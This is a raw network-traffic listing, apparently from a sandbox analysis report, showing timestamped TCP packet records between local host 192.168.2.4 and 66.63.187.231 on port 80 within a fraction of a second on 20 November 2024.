                                                                                                                              Nov 20, 2024 10:57:06.134116888 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134130955 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134145975 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134150028 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134150028 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134161949 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134176970 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134181023 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134192944 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134207010 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134222031 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134227991 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134227991 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134238005 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134253979 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134265900 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134269953 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134285927 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134299994 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134299994 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134300947 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.134357929 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.134357929 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.156872034 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.156927109 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.156948090 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.156966925 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.156991959 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.157058954 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.157382011 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.157421112 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.157444954 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.157488108 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.158075094 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.158111095 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.158143997 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.158170938 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.158735037 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.158797026 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.158898115 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.158935070 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.158988953 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.158988953 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.159877062 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.159912109 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.159944057 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.159946918 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.159976959 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.159981966 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.160031080 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.160031080 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.187141895 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.187274933 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.187302113 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.187305927 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.187330961 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.187366009 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.187624931 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.187659979 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.187782049 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.187792063 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.187844992 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.188757896 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.188796997 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.188849926 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.188849926 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.189244986 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.189281940 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.189316988 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.189344883 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.189739943 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.189774036 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.189836979 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.189836979 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.189889908 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.189939976 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.190876961 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.190912962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.190948963 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.190962076 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.190962076 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.191024065 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.191809893 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.191845894 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.191879988 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.191895962 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.191895962 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.191914082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.191950083 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.191982985 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.192815065 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.192850113 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.192883968 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.192895889 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.192895889 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.192936897 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.193685055 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.193722010 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.193757057 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.193770885 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.193770885 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.193854094 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.194714069 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.194751024 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.194781065 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.194787025 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.194796085 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.194823980 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.194845915 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.195022106 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.198975086 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.199196100 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231122017 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231209040 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231218100 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231256008 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231281042 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231287956 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231504917 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231543064 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231580973 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231595039 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231595039 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231632948 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231868982 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231906891 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231928110 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.231940985 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.231952906 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.232033968 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.232861996 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.232897997 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.232913971 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.232930899 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.232965946 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.232976913 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.232976913 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.233066082 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.233387947 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.233423948 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.233458042 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.233458042 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.233484983 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.233525991 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.234833002 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.234909058 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.234977961 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.235013962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.235043049 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.235066891 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236016989 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236052990 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236073017 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236085892 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236120939 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236121893 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236145973 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236166954 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236500025 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236557007 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236804962 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236840010 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.236875057 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.236908913 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.237552881 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.237615108 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.237689018 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.237793922 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.237833977 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.237895966 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.239151001 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.239207983 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.239236116 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.239242077 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.239263058 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.239278078 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.239290953 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.239336014 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.240348101 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.240382910 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.240411043 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.240421057 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.240441084 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.240473986 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.241322041 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.241357088 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.241379976 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.241391897 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.241427898 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.241502047 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242007017 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242042065 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242064953 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242078066 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242113113 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242125034 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242125034 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242218018 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242867947 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242902994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242919922 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242938995 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.242990017 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.242990017 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.243592978 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.243628979 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.243652105 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.243664026 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.243685961 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.243715048 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.244740963 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.244776011 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.244810104 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.244813919 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.244813919 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.244843960 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.244857073 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.244895935 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.245320082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.245356083 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.245372057 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.245398045 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.246165991 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.246202946 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.246222019 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.246254921 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.246629953 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.246685982 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.246795893 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.246849060 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.246953011 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.246989012 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.247008085 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.247023106 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.247067928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.247067928 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.247294903 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.247347116 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.247353077 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.247399092 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.249178886 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.249209881 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.249244928 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.249257088 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.249257088 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.249300957 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.249669075 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.249702930 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.249741077 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.249767065 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.250622988 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.250657082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.250693083 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.250704050 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.250704050 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.250745058 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.251477003 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.251519918 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.251539946 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.251554966 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.251579046 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.251610041 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.252187014 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.252218008 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.252253056 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.252260923 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.252260923 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.252326012 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.252357960 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.252382040 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.278259039 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.278295994 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.278331995 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.278419018 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.278419018 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.278419018 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.279151917 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.279206038 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.279344082 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.279396057 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.279469967 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.279521942 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.280586958 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.280623913 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.280653954 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.280670881 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.280670881 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.280687094 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.280713081 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.280740023 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.281449080 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.281503916 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.281626940 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.281661987 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.281704903 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.281704903 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.281768084 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.281821966 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.282500982 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.282536983 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.282555103 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.282566071 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.282588959 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.282601118 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.282625914 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.282658100 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283111095 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283164024 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283190012 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283196926 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283231974 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283241034 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283241034 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283267021 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283271074 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283299923 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283329964 CET4973080192.168.2.466.63.187.231
                                                                                                                              Nov 20, 2024 10:57:06.283348083 CET804973066.63.187.231192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:06.283353090 CET4973080192.168.2.466.63.187.231
